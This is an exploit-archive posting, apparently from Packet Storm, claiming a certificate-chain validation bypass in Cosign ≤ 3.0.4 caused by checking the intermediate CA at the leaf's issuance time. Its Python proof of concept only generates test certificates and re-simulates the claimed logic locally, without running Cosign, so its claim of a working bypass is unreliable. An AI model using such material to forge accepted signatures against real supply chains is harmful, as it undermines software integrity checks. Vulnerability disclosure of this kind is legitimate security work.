Share
## https://sploitus.com/exploit?id=PACKETSTORM:216155
=============================================================================================================================================
    | # Title     : Cosign โ‰ค 3.0.4 Temporal Certificate Chain Validation Bypass in Due to Improper Use of Issuance Time                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/sigstore/cosign/releases                                                                                 |
    =============================================================================================================================================
    
    [+] Summary    : A logical flaw in the certificate verification process of Cosign (โ‰ค 3.0.4) allows signatures to be accepted even when the issuing Intermediate Certificate Authority (CA) has already expired.
                     The vulnerability arises from validating the certificate chain using the leaf certificateโ€™s issuance time (NotBefore) instead of the current system time. 
    				 Because of this, the chain is considered valid if it was valid at the moment the leaf certificate was issued, regardless of whether the Intermediate CA is expired at verification time.
    
    The verification process performs two separate checks:
    
    It validates the certificate chain at the leafโ€™s issuance time.
    
    It validates that the leaf certificate itself is currently within its validity period.
    
    If both conditions pass, the signature is accepted โ€” even though the Intermediate CA is no longer valid.
    
    [+] POC   :  pip install cryptography
    
    import datetime
    from cryptography import x509
    from cryptography.x509.oid import NameOID
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import ec
    
    def create_poc():
        now = datetime.datetime.utcnow()
    
        root_key = ec.generate_private_key(ec.SECP256R1())
        sub_key = ec.generate_private_key(ec.SECP256R1())
        leaf_key = ec.generate_private_key(ec.SECP256R1())
    
        root_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Root CA")])
        root_cert = (
            x509.CertificateBuilder()
            .subject_name(root_subject)
            .issuer_name(root_subject)
            .public_key(root_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - datetime.timedelta(hours=10))
            .not_valid_after(now + datetime.timedelta(hours=10))
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
            .sign(root_key, hashes.SHA256())
        )
    
        sub_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Expired Intermediate")])
        sub_cert = (
            x509.CertificateBuilder()
            .subject_name(sub_subject)
            .issuer_name(root_subject)
            .public_key(sub_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - datetime.timedelta(hours=2))
            .not_valid_after(now - datetime.timedelta(minutes=10)) # Expired!
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
            .sign(root_key, hashes.SHA256())
        )
    
        leaf_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Valid Leaf")])
        leaf_cert = (
            x509.CertificateBuilder()
            .subject_name(leaf_subject)
            .issuer_name(sub_subject)
            .public_key(leaf_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - datetime.timedelta(minutes=30)) 
            .not_valid_after(now + datetime.timedelta(minutes=30))  
            .sign(sub_key, hashes.SHA256())
        )
    
        print("--- Simulating Vulnerable Logic (Cosign <= 3.0.4) ---")
    
        issuance_time = leaf_cert.not_valid_before
        if sub_cert.not_valid_before <= issuance_time <= sub_cert.not_valid_after:
            print(f"[+] Step A: Chain is considered VALID because it was valid at {issuance_time}")
    
        if leaf_cert.not_valid_before <= now <= leaf_cert.not_valid_after:
            print(f"[+] Step B: Leaf is considered VALID at current time {now}")
    
        print("\n[!] RESULT: Vulnerable Cosign would accept this signature!")
    
    if __name__ == "__main__":
        create_poc()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================